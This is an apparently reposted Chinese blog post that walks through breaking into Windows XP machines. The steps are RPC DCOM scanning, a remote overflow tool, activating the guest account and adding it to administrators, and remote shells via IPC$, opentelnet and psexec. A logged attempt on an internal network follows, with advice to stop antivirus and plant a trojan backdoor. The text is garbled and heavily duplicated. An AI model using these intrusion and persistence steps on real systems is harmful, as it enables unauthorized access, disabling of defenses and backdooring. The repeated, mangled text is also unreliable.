1.思路:突破xp系统远程访问的限制,实现文件传输和远程登陆。
2.工具:rpc漏洞扫描工具、溢出工具,pstools工具包。
3.步骤
1)步骤一:rpc漏洞扫描:
推荐使用retinarpcdcom.exe(eeye公司推出的专门针对RPC漏洞的扫描工具)
2)步骤二:远程溢出:
用xp.exe,溢出成功率极高。
3)步骤三:提升guest权限(本方案之关键):
命令:net user guest /active:yes
net localgroup aministrators guest /add
――――――――――――――――――――――――――――――
如果你用net user guest命令,将会看到下面的内容:
Password required????????????No
这正是突破xp系统远程访问帐号限制的突破口!
除了guest外,其它帐号都是
Password required??????????yes
所以就算你有xp系统的管理员帐号密码一样无所作为。
――――――――――――――――――――――――――――――
当guest提升为admin权限后,试试
dir \IPc$??
呵呵,现在你已经有了读写权限,连ipc$连接都省了~~
当然你也一样可以用net use \ip "" /user:"guest"来进行IPC$连接
到此,文件传输的问题已经解决!
4)步骤四:远程登陆
我们当然不想每次用溢出登陆对方。
那么就试试opentelnet吧
>opentelnet \ip guest "" 1 90
read ntlm failed??????????????????\shit!用administrator也是这样子。
用psexec方便多了,命令如下:
psexec \ip cmd??????
5)注意事项:
千万别在xp系统中建新帐户
xp系统默认只能登陆一个帐户,故用3389的远程登陆是不行的。
rpc溢出会导致对方重启,要慎用,尤其是服务器。
我们当然不想每次用溢出登陆对方。
那么就试试opentelnet吧
>opentelnet \ip guest "" 1 90
read ntlm failed??????????????????\shit!用administrator也是这样子。
用psexec方便多了,命令如下:
psexec \ip cmd??????
5)注意事项:
千万别在xp系统中建新帐户
xp系统默认只能登陆一个帐户,故用3389的远程登陆是不行的。
rpc溢出会导致对方重启,要慎用,尤其是服务器。
在内网里测试,首先用superscan扫了一个网段。
10.200.6.1――10.200.6.254,看看那些机子开放了 5000端口。
一般情况下这样的机子都是XP系统。好了,速度很快,出来一大片。
然后用RPC的溢出工具,打开,填入一个机子的IP地址,失败,可能已经打了补丁
没关系,继续来,终于有一个成功了
10.200.6.1――10.200.6.254,看看那些机子开放了 5000端口。
一般情况下这样的机子都是XP系统。好了,速度很快,出来一大片。
然后用RPC的溢出工具,打开,填入一个机子的IP地址,失败,可能已经打了补丁
没关系,继续来,终于有一个成功了
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
(C) 版权所有 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>
为了保险先安装一个后门,传个文件过去,这个方法很多。
TFTP,FTP,在命令行用脚本或者http下载都可以实现。
这个需要考虑对方有没有开杀毒软件,如果有的话先传个pulist.exe以及pslist.exe过去
先把杀毒软件的服务停止,然后杀掉进程,这时再传木马过去。
TFTP,FTP,在命令行用脚本或者http下载都可以实现。
这个需要考虑对方有没有开杀毒软件,如果有的话先传个pulist.exe以及pslist.exe过去
先把杀毒软件的服务停止,然后杀掉进程,这时再传木马过去。
好了,我们先看看对方的用户信息
C:WINDOWSsystem32>net user
net user
C:WINDOWSsystem32>net user
net user
\ 的用户帐户
-----------------------------------------------------------------
Administrator????????????Guest????????????????????HelpAssistant
SUPPORT_388945a0
命令运行完毕,但发生一个或多个错误。
-----------------------------------------------------------------
Administrator????????????Guest????????????????????HelpAssistant
SUPPORT_388945a0
命令运行完毕,但发生一个或多个错误。
然后我们把guest激活并加入管理员组。
C:WINDOWSsystem32>net user guest /active:yes
net user guest /active:yes
命令成功完成。
C:WINDOWSsystem32>net user guest /active:yes
net user guest /active:yes
命令成功完成。
C:WINDOWSsystem32>net localgroup administrators guest /add
net localgroup administrators guest /add
命令成功完成。
net localgroup administrators guest /add
命令成功完成。
我们来看看guest的帐户信息
net user guest
用户名???????????????? Guest
全名
注释?????????????????? 供来宾访问计算机或访问域的内置帐户
用户的注释
国家(地区)代码???????? 000 (系统默认值)
帐户启用?????????????? Yes
帐户到期?????????????? 从不
net user guest
用户名???????????????? Guest
全名
注释?????????????????? 供来宾访问计算机或访问域的内置帐户
用户的注释
国家(地区)代码???????? 000 (系统默认值)
帐户启用?????????????? Yes
帐户到期?????????????? 从不
上次设置密码?????????? 2003/11/28 下午 02:48
密码到期?????????????? 从不
密码可更改???????????? 2003/11/28 下午 02:48
需要密码?????????????? No
用户可以更改密码?????? No
密码到期?????????????? 从不
密码可更改???????????? 2003/11/28 下午 02:48
需要密码?????????????? No
用户可以更改密码?????? No
允许的工作站?????????? All
登录脚本
用户配置文件
主目录
上次登录?????????????? 从不
登录脚本
用户配置文件
主目录
上次登录?????????????? 从不
可允许的登录小时数???? All
本地组成员???????????? *Administrators?????? *Guests
全局组成员???????????? *None
命令成功完成。
全局组成员???????????? *None
命令成功完成。
看看对方开的共享
C:WINDOWSsystem32>net share
net share
C:WINDOWSsystem32>net share
net share
共享名?? 资源????????????????????????注释
------------------------------------------------------------
IPC$???????????????????????????????????????? 远程 IPC
G$?????????? G:???????????????????????????? 默认共享
F$?????????? F:???????????????????????????? 默认共享
ADMIN$?????? C:WINDOWS??????????????????????远程管理
C$?????????? C:???????????????????????????? 默认共享
E$?????????? E:???????????????????????????? 默认共享
命令成功完成。
IPC$???????????????????????????????????????? 远程 IPC
G$?????????? G:???????????????????????????? 默认共享
F$?????????? F:???????????????????????????? 默认共享
ADMIN$?????? C:WINDOWS??????????????????????远程管理
C$?????????? C:???????????????????????????? 默认共享
E$?????????? E:???????????????????????????? 默认共享
命令成功完成。
然后按照文章里的方法进行
C:>dir \10.200.6.183c$
登录失败: 未授予用户在此计算机上的请求登录类型。
C:>net use \10.200.6.183ipc$ "" /user:guest
系统发生 1385 错误。
系统发生 1385 错误。
登录失败: 未授予用户在此计算机上的请求登录类型。
重新在对方的shell里给guest设置了一个密码之后再看看
C:>net use \10.200.6.183ipc$ "123456" /user:guest
系统发生 1385 错误。
C:>net use \10.200.6.183ipc$ "123456" /user:guest
系统发生 1385 错误。
登录失败: 未授予用户在此计算机上的请求登录类型。
用psexec \10.200.6.183 cmd.exe 也不行~!!!
因为根本不能建立IPC连接。
因为根本不能建立IPC连接。
本文转自 lvcaolhx 51CTO博客,原文链接:http://blog.51cto.com/lvcaolhx/11460
